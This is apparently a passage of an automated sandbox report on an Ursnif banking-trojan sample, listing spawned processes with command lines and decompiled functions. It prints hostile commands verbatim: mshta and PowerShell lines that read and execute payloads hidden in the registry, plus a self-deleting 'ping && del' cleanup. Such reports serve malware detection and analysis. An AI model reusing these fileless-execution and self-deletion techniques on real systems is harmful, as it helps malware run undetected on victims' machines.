00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5980 Parent PID: 6424

General

Start time:	06:43:37
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
Imagebase:	0xab0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5868 Parent PID: 6424

General

Start time:	06:43:43
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
Imagebase:	0xab0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 6856 Parent PID: 3352

General

Start time:	06:46:14
Start date:	08/10/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Imagebase:	0x7ff610460000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6972 Parent PID: 6856

General

Start time:	06:46:16
Start date:	08/10/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6704 Parent PID: 6972

General

Start time:	06:46:16
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 5772 Parent PID: 3352

General

Start time:	06:46:19
Start date:	08/10/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Imagebase:	0x7ff610460000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5480 Parent PID: 5772

General

Start time:	06:46:21
Start date:	08/10/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6448 Parent PID: 5480

General

Start time:	06:46:21
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 1304 Parent PID: 6972

General

Start time:	06:46:25
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
Imagebase:	0x7ff677cd0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 3932 Parent PID: 1304

General

Start time:	06:46:26
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Imagebase:	0x7ff732960000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 344 Parent PID: 5480

General

Start time:	06:46:28
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Imagebase:	0x7ff677cd0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 5452 Parent PID: 6972

General

Start time:	06:46:29
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
Imagebase:	0x7ff677cd0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 3380 Parent PID: 344

General

Start time:	06:46:31
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Imagebase:	0x7ff732960000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 3912 Parent PID: 5452

General

Start time:	06:46:31
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Imagebase:	0x7ff732960000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 5640 Parent PID: 5480

General

Start time:	06:46:35
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Imagebase:	0x7ff677cd0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: control.exe PID: 4000 Parent PID: 6424

General

Start time:	06:46:35
Start date:	08/10/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6dd8e0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 4880 Parent PID: 5640

General

Start time:	06:46:37
Start date:	08/10/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Imagebase:	0x7ff732960000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6504 Parent PID: 4000

General

Start time:	06:46:39
Start date:	08/10/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6ce540000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 6972

General

Start time:	06:46:41
Start date:	08/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: control.exe PID: 3548 Parent PID: 6388

General

Start time:	06:46:43
Start date:	08/10/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6dd8e0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6040 Parent PID: 3548

General

Start time:	06:46:46
Start date:	08/10/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6ce540000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4452 Parent PID: 3352

General

Start time:	06:46:59
Start date:	08/10/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Imagebase:	0x7ff673be0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4584 Parent PID: 4452

General

Start time:	06:46:59
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 6088 Parent PID: 4452

General

Start time:	06:47:00
Start date:	08/10/2021
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff704c90000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1460 Parent PID: 3352

General

Start time:	06:47:06
Start date:	08/10/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Imagebase:	0x7ff673be0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6536 Parent PID: 1460

General

Start time:	06:47:07
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 6372 Parent PID: 1460

General

Start time:	06:47:09
Start date:	08/10/2021
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff704c90000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4084 Parent PID: 3352

General

Start time:	06:47:10
Start date:	08/10/2021
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6424 Parent PID: 1140 loaddll32.exeCOMMON

Executed Functions

Function 00B665CE, Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(00B81488), ref: 00B665EC

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

memset.NTDLL ref: 00B6661D
RtlInitializeCriticalSection.NTDLL(0434C0A0), ref: 00B6662E

Part of subcall function 00B70D43: RtlInitializeCriticalSection.NTDLL(00B81460), ref: 00B70D67
Part of subcall function 00B70D43: RtlInitializeCriticalSection.NTDLL(00B81440), ref: 00B70D7D
Part of subcall function 00B70D43: GetVersion.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B70D8E
Part of subcall function 00B70D43: GetModuleHandleA.KERNEL32(00001623,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B70DC2

Part of subcall function 00B5DA96: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 00B5DAB0

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,00B577C7,?), ref: 00B66657
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B66668
CloseHandle.KERNEL32(00000294,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6667C
GetUserNameA.ADVAPI32(00000000,?), ref: 00B666C5
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B666D8
GetUserNameA.ADVAPI32(00000000,?), ref: 00B666ED
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 00B6671D
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B66732
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6673C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B66749
GetShellWindow.USER32 ref: 00B66764
GetWindowThreadProcessId.USER32(00000000), ref: 00B6676B
memcpy.NTDLL(00B81354,?,00000018,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B667A7
CreateEventA.KERNEL32(00B81248,00000001,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?), ref: 00B66825
RtlAllocateHeap.NTDLL(00000000,00000018), ref: 00B6684F
OpenEventA.KERNEL32(00100000,00000000,0434B9D0,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B66877
CreateEventA.KERNEL32(00B81248,00000001,00000000,0434B9D0,?,?,?,?,?,?,?,00B577C7,?), ref: 00B6688C
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B66892
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6692A
SetEvent.KERNEL32(?,00B70CD6,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?), ref: 00B669C0
RtlAllocateHeap.NTDLL(00000000,00000043,00B70CD6), ref: 00B669D5
wsprintfA.USER32 ref: 00B66A05

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
String ID:
API String ID: 3929413950-0
Opcode ID: fa0fadfec771fdd69ef4ec6bfd6869d54ac38d99af5a8ffcff11560412c44af3
Instruction ID: b9d3b5e4f9a6f184591db248613c63ce54f9fda449d47e9a6c5fecc786bdbdc8
Opcode Fuzzy Hash: fa0fadfec771fdd69ef4ec6bfd6869d54ac38d99af5a8ffcff11560412c44af3
Instruction Fuzzy Hash: 1AC19DB15013489FC710EFA9ED88A2A7BECEB84704B044C9EF556E3270DB34984ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1172, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1A1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E1A2160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e1a41c4;
				_push(_t15 + 0x6e1a505e);
				_push(_t15 + 0x6e1a5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1A215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e1a41c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e1a1172
0x6e1a117b
0x6e1a117f
0x6e1a1185
0x6e1a118a
0x6e1a118f
0x6e1a1192
0x6e1a1195
0x6e1a119a
0x6e1a119b
0x6e1a119e
0x6e1a11a9
0x6e1a11b0
0x6e1a11b4
0x6e1a11b6
0x6e1a11b7
0x6e1a11ba
0x6e1a11bf
0x6e1a11c9
0x6e1a11cb
0x6e1a11cb
0x6e1a11df
0x6e1a11e5
0x6e1a11e9
0x6e1a1239
0x6e1a11eb
0x6e1a11f4
0x6e1a120a
0x6e1a1212
0x6e1a1224
0x6e1a1228
0x00000000
0x00000000
0x6e1a1214
0x6e1a1217
0x6e1a121c
0x6e1a121e
0x6e1a121e
0x6e1a11ff
0x6e1a1201
0x6e1a122a
0x6e1a122b
0x6e1a122b
0x6e1a11f4
0x6e1a1241

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E1A1132,0000000A,?,?), ref: 6E1A117F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1A1195
_snwprintf.NTDLL ref: 6E1A11BA
CreateFileMappingW.KERNELBASE(000000FF,6E1A41C8,00000004,00000000,?,?), ref: 6E1A11DF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1132,0000000A,?), ref: 6E1A11F6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1A120A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1132,0000000A,?), ref: 6E1A1222
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1132,0000000A), ref: 6E1A122B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1A1132,0000000A,?), ref: 6E1A1233

Strings

`RtAt, xrefs: 6E1A117F
@Mt MtTt, xrefs: 6E1A11EB, 6E1A1233

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @Mt MtTt$`RtAt
API String ID: 1724014008-3198888170
Opcode ID: c7cc6a94fd76c8f28761f330b2d8df729636d75a6fcb17235bf7090d4472bf33
Instruction ID: 5c41a86b9c8a24e3348bc62cf0dc444b34601cd79cd5f11dc9cab9cbd7b828cc
Opcode Fuzzy Hash: c7cc6a94fd76c8f28761f330b2d8df729636d75a6fcb17235bf7090d4472bf33
Instruction Fuzzy Hash: A82171B6600108AFDB00AFECCD88EFE77BAEB59355F218126F715E7140D6709985AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A15C6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120
sleepnativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1A15C6(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E6E1A1825();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E6E1A1000(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E6E1A1397(_t57);
						}
					} while (_v8 != 0);
					_t27 = E6E1A189E(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E6E1A153C(E6E1A10B9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8); // executed
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E6E1A1AD7(_t53,  &_a4) != 0) {
					 *0x6e1a41b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x6e1a41b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E6E1A1000(_t60 + _t19);
				 *0x6e1a41b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E6E1A1397(_t52);
				goto L18;
			}

0x6e1a15cc
0x6e1a15d1
0x6e1a15d6
0x6e1a1701
0x6e1a1701
0x6e1a15df
0x6e1a15df
0x6e1a15e3
0x6e1a15e6
0x6e1a15e7
0x6e1a15ed
0x6e1a15f1
0x6e1a1628
0x6e1a15f3
0x6e1a15fb
0x6e1a1601
0x6e1a1603
0x6e1a1608
0x6e1a160e
0x6e1a1610
0x6e1a1610
0x6e1a1617
0x6e1a161d
0x6e1a161d
0x6e1a1621
0x6e1a1621
0x6e1a162f
0x6e1a1636
0x6e1a163f
0x6e1a1642
0x6e1a1648
0x6e1a164b
0x6e1a1654
0x6e1a16fd
0x00000000
0x6e1a16ff
0x6e1a165d
0x6e1a16ae
0x6e1a16ae
0x6e1a16c4
0x6e1a16c8
0x6e1a16f0
0x6e1a16ca
0x6e1a16cd
0x6e1a16d3
0x6e1a16d8
0x6e1a16df
0x6e1a16df
0x6e1a16e6
0x6e1a16e6
0x6e1a16f3
0x6e1a16f9
0x6e1a16fb
0x6e1a16fb
0x00000000
0x6e1a16f9
0x6e1a166a
0x6e1a16a8
0x00000000
0x6e1a16a8
0x6e1a166c
0x6e1a1671
0x6e1a1678
0x6e1a167a
0x6e1a167e
0x6e1a16a0
0x6e1a16a0
0x00000000
0x6e1a16a0
0x6e1a1680
0x6e1a1685
0x6e1a168a
0x6e1a1691
0x00000000
0x00000000
0x6e1a1696
0x6e1a1699
0x00000000

APIs

Part of subcall function 6E1A1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1A15D1), ref: 6E1A1834
Part of subcall function 6E1A1825: GetVersion.KERNEL32 ref: 6E1A1843
Part of subcall function 6E1A1825: GetCurrentProcessId.KERNEL32 ref: 6E1A185F
